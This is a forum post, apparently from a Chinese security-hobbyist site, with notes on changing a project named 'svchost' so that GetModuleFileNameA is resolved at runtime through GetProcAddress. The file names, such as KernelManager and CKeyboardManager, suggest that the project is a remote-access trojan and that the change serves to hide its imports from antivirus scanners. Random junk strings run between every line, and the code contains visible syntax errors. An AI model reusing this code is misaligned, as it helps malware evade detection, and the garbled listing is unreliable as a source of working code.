标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
6 k4 J& Z* |+ R! W. L
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
" o9 b9 U) B; W; V
----------------------------------------
/ R+ t0 k/ l- k) q
DTDY.h:
1 A( d' K: f3 I7 ~
' h* m; F; q) e
#if _MSC_VER>1000
; o9 g* Q6 T9 U, _- f# P3 W4 A
#pragma once
H$ E/ {- ^5 x% u
#endif //_MSC_VER>1000
& W: M. Z2 R( m# @3 @7 M) T
#include<windows.h>
1 m7 G; p' o% [& @) L5 H/ d* B0 Q, {
* X7 L* |/ p6 h* G/ Q% ?3 R/ s8 D
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
{+ D: B# R6 k7 X. q
class DTDY
7 S5 P# u2 r' w
{
7 J" T# F. e$ i+ s+ r! f4 b
public:
: R* e8 S' d. @. q' j/ e
DTDY();
6 i8 u% Z3 l. _* ~0 V, w
virtual ~DTDY();
/ h6 c. A2 g$ G, U) V
public:
9 I/ O" a* v( R% ]
static pGetModuleFileNameA MyGetModuleFileName;
8 e4 s, ~/ g: }3 L9 F3 u
static BOOL FunInitiallization();
' y1 r7 h; q6 f5 q. L6 w
};
# P9 t4 q& R. i# E' ]4 Y
#endif
E: w# Y3 M0 V
----------------------------------------
% z; V9 \ l0 q2 w. @$ A; Q H
) j0 r& N' W! _0 S8 O# ^
DTDY.cpp:
7 F( n8 c$ @5 _# s9 _
8 D8 d6 G8 [' y
#include "DTDY.h"
# i+ J0 u% d) ]& k4 S% c
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
. C# t6 v) g y' h; ]: ^& A
DTDY:TDY()
. X: |, Z5 h! \& l
{
- w; U" r# ~4 d) z
}
6 D6 G: v+ K" y7 }, }8 M
DTDY::~DTDY()
' p9 [& m2 z) j* n. ?+ |9 P
{
! r+ v$ L/ y8 I' t. }9 z
}
7 x, K6 t, k- j+ k5 K3 W$ g
BOOL DTDY::FunInitiallization()
2 A* X' I9 J% Z6 r
{
7 F5 b" O, N$ R/ a
HMODULE hModule=LoadLibrary("kernel32.dll");
/ a8 f- B% g( S! `6 C, ^' a3 e
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
6 U+ g6 z$ j- N: b9 ?
if(!MyGetModuleFileName=) return FALSE;
0 e" T, \# B% K6 C7 ?6 D' ?
4 e0 L5 k: A0 o4 D( k. C) Z
return TRUE;
' {+ o0 r# A Q V2 t, U
}
; ~9 e+ Z' s- I9 E4 ?
----------------------------------------
: S; e" L; O' e# l: x0 o- [
svchost.cpp:
% p% v$ G; c+ v8 V, _
! L# Z. A8 U9 [+ {
#include "DTDY.h"
' F0 D0 |( Z( I/ j" L
2 R' `& |% ?4 S/ X+ q4 {& _$ ?$ Z
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
: B" w# Q# z4 D1 [' }4 C
{
7 W5 @6 {/ b6 N
switch(ul_reason_for_call)
7 v$ ~/ J- p$ D" S: X
{
! B; \' R2 I6 t$ j. @
case DLL_PROCESS_ATTACH:
$ c, w+ w1 J# X
if(!DTDY::FunInitiallization()) return FALSE;
0 k8 O7 r1 K( l2 C8 e( y
, @- @+ }% F' W# M
break;
5 Z6 y+ v/ _5 r
}
( y) O9 O4 a. w x6 A
}
+ Y5 R3 m6 S* c6 b8 A; X/ s, u
( h; S7 o$ K2 Q+ _
- `: g# Q* c) V! ^
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
' G0 v# Y6 b; ]4 | |: V( l4 {
改写为
* y! z+ ?9 y/ S" Z
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
! q" X2 D! c- ?+ _
----------------------------------------
& ~, z# A5 Y9 D, {- G; ?! `: q
KernelManager.cpp:
5 ^, b$ ]0 ]5 J5 y2 A* c
* }" ?7 U6 V4 j+ j/ r0 X
#include "../DTDY.h"
* R1 v4 s+ N' e" _5 u% d
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
0 g, b! a- `7 ?
改写为
3 f! ~: I% c6 q4 I. J
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
1 H& ~+ ?% W- t; o/ I1 r
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
